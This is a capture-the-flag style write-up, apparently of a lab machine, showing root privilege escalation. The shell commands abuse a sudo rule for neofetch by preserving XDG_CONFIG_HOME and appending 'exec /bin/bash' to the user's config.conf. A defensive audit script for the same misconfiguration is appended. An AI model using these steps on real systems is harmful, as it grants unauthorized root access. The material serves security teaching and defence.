neofetch
neofetch is a system information tool written in the bash shell scripting language. On the left side is always a logo of the distribution, rendered in ASCII art. Unlike a system monitor, the tool only features a static display of the computer’s basic hardware and software configurations and their versions, typically operating system, the host (namely the technical name of the machine), uptime, package managers, the shell, display resolution, desktop environment, window manager, themes and icons, the computer terminal, CPU, GPU, and RAM. Neofetch can also display images on the terminal with w3m-img in place of the ASCII logo art.
- neofetch makes use of a configuration file called config.conf by default, which is located in the $HOME/.config/neofetch/ directory. This file contains various options and settings that control the behavior and appearance of neofetch.
- The config.conf file allows users to customize the output of neofetch by changing the values of various options such as the ASCII art, the color scheme, the system information to display, and many others. Users can modify the config.conf file using a text editor or by using the neofetch --config command to open the configuration file in their default editor.
- It's worth noting that neofetch also supports various command-line options that allow users to override the settings in the config.conf file and customize the output of neofetch on the fly.
- Custom commands can also be added to the config.conf file, as it is just a Bash script
Exploitation
I would first need to check the value of the XDG_CONFIG_HOME environment variable
I need to make sure that the environment variable is set and points to the directory where the config file is located
thomas@meta:~$ echo $XDG_CONFIG_HOME
The XDG_CONFIG_HOME environment variable is not defined at all
Without defining the environment variable above, neofetch wouldn't know where to look for the config file, resulting in the default operation
However, I can just set it up
thomas@meta:~$ export XDG_CONFIG_HOME=/home/thomas/.config
thomas@meta:~$ echo $XDG_CONFIG_HOME
/home/thomas/.config
The XDG_CONFIG_HOME option should now be working and preserved for the sudo-privileged command
thomas@meta:~$ echo 'exec /bin/bash' >> ~/.config/neofetch/config.conf
Since it's all just Bash, I can just use Bash exec function to spawn another Bash shell
thomas@meta:~$ sudo -u root /usr/bin/neofetch
root@meta:/home/thomas#
root@meta:/home/thomas# whoami
root
root@meta:/home/thomas# hostname
meta
root@meta:/home/thomas# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.10.11.140 netmask 255.255.254.0 broadcast 10.10.11.255
ether 00:50:56:b9:20:93 txqueuelen 1000 (Ethernet)
RX packets 3391534 bytes 668444571 (637.4 MiB)
RX errors 0 dropped 87 overruns 0 frame 0
TX packets 3398228 bytes 1262226964 (1.1 GiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
loop txqueuelen 1000 (Local Loopback)
RX packets 11141 bytes 856516 (836.4 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 11141 bytes 856516 (836.4 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
System Level Compromise
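
A defender-side check for the two conditions the steps above rely on, as an added example that is not part of the original write-up: sudo preserving XDG_CONFIG_HOME, and a config file that an unprivileged user can edit. The sudoers text is a constructed sample (the page does not show the real policy), and the function names are illustrative.

```bash
#!/bin/sh
# Added example (not from the original write-up): audit the two conditions
# the escalation above depends on. Sample sudoers text is constructed.

# Constructed sample policy; the real sudoers file is not shown on the page.
SAMPLE_SUDOERS='Defaults env_reset
Defaults env_keep += "XDG_CONFIG_HOME"
thomas ALL=(root) NOPASSWD: /usr/bin/neofetch'

# Read sudoers-format text on stdin; print Defaults env_keep lines that
# preserve variable $1. Exit status 0 means the variable survives sudo.
sudoers_keeps_var() {
    grep -E '^[[:space:]]*Defaults[^#]*env_keep' |
        grep -E "(^|[^A-Za-z0-9_])$1([^A-Za-z0-9_]|\$)"
}

# Return 0 if path $1 exists and is either not owned by uid $2 or is
# writable by group/other. Uses POSIX `ls -ldn` (numeric owner in field 3).
path_is_untrusted() {
    [ -e "$1" ] || return 1
    ls -ldnL -- "$1" | (
        read -r mode _links owner _rest
        [ "$owner" = "$2" ] || exit 0
        case $mode in ?????w*|????????w*) exit 0 ;; esac
        exit 1
    )
}

# Return 0 and list findings if anything neofetch would source from config
# home $1 can be modified by someone other than trusted uid $2 (default 0).
neofetch_config_is_hijackable() {
    nf_home=$1; nf_uid=${2:-0}; nf_status=1
    for nf_path in "$nf_home" "$nf_home/neofetch" "$nf_home/neofetch/config.conf"; do
        if path_is_untrusted "$nf_path" "$nf_uid"; then
            echo "UNSAFE: $nf_path"; nf_status=0
        fi
    done
    return "$nf_status"
}

# Demo: check the constructed policy, then the invoking user's config home.
printf '%s\n' "$SAMPLE_SUDOERS" | sudoers_keeps_var XDG_CONFIG_HOME
neofetch_config_is_hijackable "${XDG_CONFIG_HOME:-$HOME/.config}" || true
```

If either check reports a finding for a program that root runs through sudo, the config it sources should be treated as attacker-controlled input.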